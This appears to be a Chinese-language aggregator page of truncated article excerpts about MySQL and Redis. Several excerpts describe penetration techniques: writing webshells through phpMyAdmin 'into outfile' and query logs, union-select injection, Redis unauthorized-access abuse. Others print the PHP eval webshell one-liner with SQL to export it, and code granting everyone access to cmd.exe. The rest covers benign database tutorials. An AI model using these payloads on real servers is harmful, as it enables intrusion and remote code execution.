在某些情况下,当我们进入了一个网站的phpMyAdmin时,想通过select into outfile来写shell,但是通常都会报错. 这是因为在mysql 5.6.34版本以后 secure_file_priv的值默认为NULL.并且无法用sql语句对其进行修改,只能够通过以下方式修改 日志利用: 方法一:慢查询日志  (slow query log)mysql也具有日志,我们也可以通过日志来getshell.mysql日志主要包含:错误日志.查询日志.慢查询日志.事务日志,日志的详细情况…

redis和mongodb我之所见 最近自己在做一些个人的小创作.小项目,其中用到了mongodb和redis,最初可能对这二者没有深入的认识.都是所谓的“非关系型数据库”,有什么区别么? 实际上,在我看来,redis的角色更接近于memcache,而mongodb是一个真正的数据库. redis是一个key-value型数据库,信息以键对应值的关系存储在内存中,比memcache较大的优势就在于其数据结构的多样性. 说它不算一个真正意义上的数据库,因为redis是主要把数据存储在内存中(当然可…

前端必备之Node+mysql+ejs模版如何写接口 这星期公司要做一个视频的后台管理系统, 让我用Node+mysql+ejs配合写接口, 周末在家研究了一下, 趁还没来具体需求把研究内容在这里分享一下. 1.准备 准备Node环境,mysql环境,我这里用express脚手架起了一个小项目demo   2.建数据库 我这里用了可视化工具,Navicat Premium新建了一个表cookbook,以下是我的demo数据 3.mysql如何写 1>yarn add mysql安装mysql包…

0x01 什么是Redis未授权访问漏洞 Redis 默认情况下,会绑定在 0.0.0.0:,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数据.攻击者在未授权访问 Redis 的情况下,利用 Redis 自身的提供的config 命令,可以进行写文件操作,攻击者可以成功将自己的ssh公钥…

0x00 写数据的前提 1,在mysql的配置文件 my.ini 中,secure_file_priv="c:/wamp64/tmp" 被注释 或者 `secure_file_priv 配置的位置是web目录.2,未开启全局gpc.(php5.329之后就没有magic_quotes_gpc) 0x01 union select 写入 最常见的写入方式,union select 后跟 into outfile 语句注入点语句?id=1' union select 1,2,'<?p…

一.常规导入shell的操作    创建数据表导出shell    CREATE TABLE `mysql`.`shadow9` (`content` TEXT NOT NULL );    INSERT INTO `mysql`.`shadow9` (`content` ) VALUES ('<?php @eval($_POST[pass]);?>');    SELECT `content` FROM `shadow9` INTO OUTFILE 'C:\\phpStudy\\WWW\\9…

try { var strPath:String = "c:\\windows\\temp\\cmd.exe", strUser:String = "everyone"; var dirinfo:System.IO.DirectoryInfo = new System.IO.DirectoryInfo(strPath); var dirsecurity:System.Security.AccessControl.DirectorySecurity = dirinfo…

目录: 目录见文章1 本文是基于windows下来操作,linux下,mysql-connector-java-5.1.46.jar包的放置有讲究. mr程序 import java.io.DataInput; import java.io.DataOutput; import java.io.IOException; import java.sql.PreparedStatement; import java.sql.ResultSet; import java.sql.SQLExceptio…

分类: MySQL 架构设计 2013-05-08 01:40 5361人阅读 评论(8) 收藏 举报 mysql 高可用 keepalive ㈠ 实战环境 服务器名· IP OS MySQL odd.example.com 192.168.1.116 RHEL-5.8 5.5.16 even.example.com 192.168.1.115 RHEL-5.8 5.5.16 ㈡ 方案优缺点              优点              ● 安装配置简单, 实现方便,高可用效率好,可…

1 MySQL简介 MySQL是最流行的开放源码SQL数据库管理系统,相对于Oracle,DB2等大型数据库系统,MySQL由于其开源性.易用性.稳定性等特点,受到个人使用者.中小型企业甚至一些大型企业的广泛欢迎,MySQL具有以下特点: l  MySQL是一种关联数据库管理系统,关联数据库将数据保存在不同的表中,而不是将所有数据放在一个大的仓库内,这样就增加了速度并提高了灵活性. l  MySQL软件是一种开放源码软件. l  MySQL数据库服务器具有快速.可靠和易于使用的特点. l  My…